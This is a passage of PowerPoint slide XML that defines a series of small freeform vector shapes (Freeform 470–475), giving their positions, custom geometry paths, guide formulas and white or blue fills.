            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10389" name="Freeform 470"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1611312" y="6403975"/>
            <a:ext cx="11113" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 5"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 5"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 5"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 5"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10390" name="Freeform 471"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="6197600"/>
            <a:ext cx="42863" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T10" fmla="*/ 0 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T12" fmla="*/ 0 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T39" fmla="*/ 0 h 92"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T41" fmla="*/ 0 h 92"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T43" fmla="*/ 0 h 92"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T45" fmla="*/ 0 h 92"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T47" fmla="*/ 0 h 92"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T49" fmla="*/ 0 h 92"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 92"/>
              <a:gd name="T80" fmla="*/ 19 w 19"/>
              <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10391" name="Freeform 472"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1728787" y="6170613"/>
            <a:ext cx="60325" cy="233362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 0 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 0 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T35" fmla="*/ 0 h 104"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T37" fmla="*/ 0 h 1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104"/>
              <a:gd name="T59" fmla="*/ 27 w 27"/>
              <a:gd name="T60" fmla="*/ 104 h 1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104">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10392" name="Freeform 473"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1506537" y="6208713"/>
            <a:ext cx="41275" cy="182562"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T10" fmla="*/ 0 w 18"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T43" fmla="*/ 0 h 81"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T45" fmla="*/ 0 h 81"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 81"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 8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
              <a:gd name="T79" fmla="*/ 0 h 81"/>
              <a:gd name="T80" fmla="*/ 18 w 18"/>
              <a:gd name="T81" fmla="*/ 81 h 8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 h="81">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10393" name="Freeform 474"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1509712" y="6219825"/>
            <a:ext cx="31750" cy="155575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T10" fmla="*/ 0 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T12" fmla="*/ 0 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 0 h 69"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 0 h 69"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 0 h 69"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T47" fmla="*/ 0 h 69"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 69"/>
              <a:gd name="T80" fmla="*/ 14 w 14"/>
              <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                <a:moveTo>
                  <a:pt x="5" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10394" name="Freeform 475"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="6232525"/>
            <a:ext cx="26987" cy="128588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T8" fmla="*/ 0 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T10" fmla="*/ 0 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T12" fmla="*/ 0 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 57"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 57"/>
